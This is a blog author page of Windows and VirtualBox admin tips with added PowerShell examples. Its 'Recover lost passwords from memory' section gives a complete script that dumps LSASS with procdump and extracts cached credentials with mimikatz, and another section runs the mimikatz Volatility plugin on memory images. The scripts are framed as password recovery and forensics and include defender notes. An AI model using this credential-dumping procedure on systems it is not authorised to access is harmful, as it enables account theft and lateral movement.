All posts by Michael Albert

Windows: List all users who are currently logged on


If you want to list all users who are currently logged on to the box, use the query command.

List all sessions

c:\> query session
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console                                     1  Conn
>rdp-tcp#0         user1                     2  Active  rdpwd
 rdp-tcp                                 65536  Listen

Or list only the users (the > in the first column marks the session you are running the command from):

c:\> query user
>user1                 rdp-tcp#0           2  Active          .  21.02.2015 19:42

You can also list the processes running in each user's session:

c:\> query process
 USERNAME              SESSIONNAME         ID    PID  IMAGE
>user1                 rdp-tcp#0            2   6076  taskhost.exe
>user1                 rdp-tcp#0            2   6592  rdpclip.exe
>user1                 rdp-tcp#0            2   4840  dwm.exe
>user1                 rdp-tcp#0            2   4680  explorer.exe
>user1                 rdp-tcp#0            2   7092  vmtoolsd.exe
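
As an added example (not part of the original post), a PowerShell wrapper that turns the fixed-width text of query user (quser.exe, the same program) into objects, so the result can be filtered or collected from several hosts. It handles the two details that break naive parsers: the > marker on the calling session, and the empty SESSIONNAME column of disconnected sessions. The sample at the end is constructed from the post's own output plus one disconnected session; Get-LoggedOnUser and ConvertFrom-QuserOutput are names chosen for this example.

```powershell
# Added example, not from the original post: parse 'query user' / quser output into objects.
function ConvertFrom-QuserOutput {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)][string]$Line)
    process {
        if ([string]::IsNullOrWhiteSpace($Line)) { return }
        if ($Line -match '^\s*USERNAME\s+SESSIONNAME') { return }     # header row
        # '>' in column 1 marks the session the command was run from
        $current = $Line.StartsWith('>')
        # columns are separated by runs of two or more spaces; a single space
        # (as inside "21.02.2015 19:42") stays inside its field
        $fields = ($Line -replace '^>', ' ').Trim() -split '\s{2,}'
        # a disconnected session has an empty SESSIONNAME column, so only 5 fields survive
        if ($fields.Count -eq 5) { $fields = @($fields[0], '') + $fields[1..4] }
        if ($fields.Count -ne 6) { Write-Warning "unparsed line: $Line"; return }
        [pscustomobject]@{
            UserName    = $fields[0]
            SessionName = $fields[1]
            Id          = [int]$fields[2]
            State       = $fields[3]
            IdleTime    = $fields[4]
            LogonTime   = $fields[5]
            Current     = $current
        }
    }
}

function Get-LoggedOnUser {
    [CmdletBinding()]
    param([string[]]$ComputerName = $env:COMPUTERNAME)
    foreach ($computer in $ComputerName) {
        # /server: queries a remote host; that needs administrator rights there and RPC access.
        # When nobody is logged on quser only prints "No User exists for *" (hidden by 2>$null).
        $raw = & quser.exe /server:$computer 2>$null
        $raw | ConvertFrom-QuserOutput |
            Add-Member -NotePropertyName ComputerName -NotePropertyValue $computer -PassThru
    }
}

# Constructed sample: the post's output plus one disconnected session, to run the parser offline
$sample = @'
 USERNAME              SESSIONNAME         ID  STATE   IDLE TIME  LOGON TIME
>user1                 rdp-tcp#0            2  Active          .  21.02.2015 19:42
 user2                                      3  Disc         1:05  21.02.2015 18:00
'@ -split "`r?`n"
$sample | ConvertFrom-QuserOutput | Format-Table -AutoSize

# Live use: disconnected sessions still have a logon session (and cached credentials) behind them
Get-LoggedOnUser | Where-Object State -eq 'Disc'
```

The State and SessionName columns are the interesting ones from a security point of view: a disconnected RDP session keeps its logon session, and with it the credential material that the "Recover lost passwords from memory" post below pulls out of LSASS, so a stale Disc session from a privileged account on a jump host is worth cleaning up (logoff <id>) rather than leaving around.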


Security: Install mimikatz offline plugin to volatility (DRAFT!!!)


Here are the steps to install the mimikatz offline plugin and get it running under Volatility on a Windows 7 x64 operating system. This is currently a draft, but it works for me.

1. Install volatility
Get the latest Python 2 version and install it, in this example to the target directory d:\Python27. Use the x86 (32-bit) version even on x64 systems; otherwise the Volatility installer won't find the Python installation. Also choose an install path without spaces.

Install the Volatility 2.4 Windows Python module installer (not the standalone binary installer).
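
As an added example (not the author's steps), a PowerShell check that the install from step 1 actually meets the conditions the post names before you spend time on the plugin: that the Python found is 32-bit, that Volatility and the plugin's construct dependency import, and that Volatility lists the plugin from the --plugins directory. Everything except D:\Python27 is an assumed path; Scripts\vol.py is where I expect the module installer to put the launcher.

```powershell
# Added example, not from the original post. Paths other than D:\Python27 are assumptions.
$ErrorActionPreference = 'Stop'
$python  = 'D:\Python27\python.exe'          # install directory from the post (no spaces in the path)
$vol     = 'D:\Python27\Scripts\vol.py'      # launcher from the Volatility 2.4 module installer (assumed)
$plugins = 'D:\volatility\plugins'           # directory containing mimikatz.py (assumed)
$dump    = 'D:\dumps\win7x64.dmp'            # memory image of the Windows 7 x64 box (assumed)

# 1. The post insists on the 32-bit Python even on x64: the pointer size tells you which one you got.
$bits = & $python -c "import struct; print struct.calcsize('P') * 8"
if ($bits -ne '32') { throw "Python at $python is $bits-bit; the Volatility installer only finds the 32-bit one." }

# 2. The mimikatz plugin is written against the 'construct' library; Volatility itself must import too.
& $python -c "import volatility, construct"
if ($LASTEXITCODE -ne 0) { throw 'volatility or construct is missing from this Python.' }

# 3. Volatility only loads extra plugins from --plugins; if 'mimikatz' is not listed, the path is wrong.
$listed = & $python $vol --plugins=$plugins --info | Select-String -Pattern '^mimikatz\s'
if (-not $listed) { throw "mimikatz plugin not found in $plugins" }

# 4. Run it against the dump with the profile matching the dumped system (Windows 7 SP1 x64 here).
& $python $vol --plugins=$plugins -f $dump --profile=Win7SP1x64 mimikatz
```

If step 3 fails while the file is present, the usual cause is a .py file that does not import cleanly (missing construct, or a construct version the plugin was not written for); running it with python -c "import mimikatz" from inside the plugin directory shows the actual traceback.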

Windows: Initiate a kernel memory dump


For deeper inspection of Windows it is sometimes necessary to get a memory dump of the machine and analyse it with tools like Volatility.

There are several ways to make Windows write such a dump.

Windows: Recover lost passwords from memory


If a user is logged on and has forgotten their password, you can dump the LSASS process and recover the password from the dump file.

Two tools are needed:

  • Microsoft's Sysinternals procdump
  • mimikatz, a tool to play with Windows security. Take care when downloading precompiled binaries: better get the source code from GitHub and compile it yourself, it's very easy.

Let's start. Log in as a user with administrator permissions and dump the lsass process.
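
The procedure the post goes on to describe, written out as an added PowerShell example that is not the author's code: a few preflight checks that tell you whether the dump will contain anything useful, the procdump call, and the mimikatz commands that read the dump. It assumes procdump.exe and mimikatz.exe sit in the current directory and that the shell is elevated.

```powershell
# Added example, not from the original post. Run from an elevated PowerShell on the box whose
# LSASS you want to dump; procdump.exe and mimikatz.exe are assumed to be in the current directory.
$ErrorActionPreference = 'Stop'

# 1. Dumping LSASS needs SeDebugPrivilege, which you only hold in an elevated administrator session.
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdmin = ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) { throw 'Start this from an elevated (Run as administrator) PowerShell.' }

# 2. If LSASS runs as a protected process (RunAsPPL = 1, Windows 8.1 and later), a user-mode tool
#    such as procdump cannot open it and the dump fails.
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
if ($lsa.RunAsPPL -eq 1) { throw 'LSASS is protected (RunAsPPL); procdump will not get a handle.' }

# 3. Cleartext passwords come from the WDigest provider. Windows 8.1/2012 R2 and later cache them
#    only when UseLogonCredential = 1; Windows 7/8 (the post's target) cache them unless KB2871997
#    is installed and the value is set to 0. Without them you still get NTLM hashes, not the password.
$ulc = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue).UseLogonCredential
$modern = [Environment]::OSVersion.Version -ge [Version]'6.3'     # 6.3 = Windows 8.1 / Server 2012 R2
if (($modern -and $ulc -ne 1) -or (-not $modern -and $ulc -eq 0)) {
    Write-Warning 'WDigest is not caching cleartext: expect NTLM hashes, not passwords.'
}

# 4. Full memory dump of lsass.exe (-ma = all memory, -accepteula skips the interactive EULA prompt).
$dump = Join-Path $PWD 'lsass.dmp'
& .\procdump.exe -accepteula -ma lsass.exe $dump
if (-not (Test-Path $dump)) { throw 'procdump did not write a dump.' }

# 5. The dump is as sensitive as the passwords in it: restrict it to the current user and record
#    its hash so you can later prove which file was analysed.
& icacls.exe $dump /inheritance:r /grant:r "$($env:USERNAME):(R,W,D)" | Out-Null
(Get-FileHash $dump -Algorithm SHA256).Hash

# 6. Read it with mimikatz of the same bitness as the dumped system (x64 dump -> x64 mimikatz).
#    sekurlsa::minidump points mimikatz at the file instead of the live LSASS,
#    sekurlsa::logonpasswords then lists the cached credentials of every logon session.
& .\mimikatz.exe "sekurlsa::minidump $dump" 'sekurlsa::logonpasswords' 'exit'
```

The checks in steps 2 and 3 are also the defender's view of this technique: RunAsPPL, UseLogonCredential = 0 and, on Windows 10, Credential Guard (which moves the secrets into the isolated LSAIso process) are exactly the settings that leave such a dump without passwords. Delete the dump file when you are done; it is a credential store in its own right.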

VirtualBox: VM does not start after creating a snapshot. E_FAIL (0x80004005)


When using VHD disks, or when you convert other disk formats (VMDK, VHD) to VDI and then create a snapshot, the virtual machine won't boot.

An error occurs while starting the VM:

Error code: E_FAIL (0x80004005)
Component: ProgressProxy
Interface: IProgress {c20238e4-3221-4d3f-8891-81ce92d9f913}

In this case the Virtual Media Manager shows an error that the parent UUID of the snapshot file does not match the UUID of the parent medium stored in the media registry c:\Users\Username\.virtualbox\VirtualBox.xml.

This can be fixed 🙂 First get the UUID of the parent disk.
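
One way to carry that fix through, as an added PowerShell example rather than the author's exact steps: read the UUID of the base disk with VBoxManage showmediuminfo, compare it with the parent UUID recorded in the snapshot's differencing image, and rewrite the latter with VBoxManage internalcommands sethdparentuuid. The install path and both disk paths are assumptions; Get-VBoxMediumInfo is a helper name chosen for this example.

```powershell
# Added example, not from the original post: make the snapshot's differencing image point at the
# UUID of its registered base disk. Paths are assumptions; adjust them to your VM.
$ErrorActionPreference = 'Stop'
$VBoxManage = Join-Path $env:ProgramFiles 'Oracle\VirtualBox\VBoxManage.exe'   # default install location
$base = 'D:\VMs\Win7\Win7.vdi'                                                  # the disk converted to VDI
$diff = 'D:\VMs\Win7\Snapshots\{1a2b3c4d-0000-0000-0000-000000000001}.vdi'      # created by the snapshot

# showmediuminfo prints a "UUID:" line and a "Parent UUID:" line ("base" for a base disk)
function Get-VBoxMediumInfo {
    param([string]$Path)
    $out = & $VBoxManage showmediuminfo disk $Path
    $uuid = $null; $parent = $null
    foreach ($line in $out) {
        if ($line -match '^UUID:\s+(\S+)')        { $uuid   = $Matches[1] }
        if ($line -match '^Parent UUID:\s+(\S+)') { $parent = $Matches[1] }
    }
    [pscustomobject]@{ Path = $Path; Uuid = $uuid; ParentUuid = $parent }
}

$baseInfo = Get-VBoxMediumInfo $base
if (-not $baseInfo.Uuid) { throw "could not read the UUID of $base" }
$diffInfo = Get-VBoxMediumInfo $diff          # ParentUuid stays $null if VirtualBox refuses to open it
"base disk UUID          : $($baseInfo.Uuid)"
"snapshot's parent UUID  : $($diffInfo.ParentUuid)"

if ($diffInfo.ParentUuid -ne $baseInfo.Uuid) {
    # sethdparentuuid edits the header of the image file itself, not VirtualBox.xml, so close the
    # VirtualBox GUI first (it rewrites the registry on exit) and keep a copy of the image.
    Copy-Item $diff "$diff.bak"
    & $VBoxManage internalcommands sethdparentuuid $diff $baseInfo.Uuid
    "parent UUID of $diff set to $($baseInfo.Uuid)"
} else {
    'parent UUID already matches; the mismatching side is the entry in VirtualBox.xml'
}
```

If the image already carries the right parent UUID and the registry entry is what is stale, the cleaner route is to remove the medium from the Virtual Media Manager and add it again, which refreshes the UUIDs stored in VirtualBox.xml, rather than editing that file by hand.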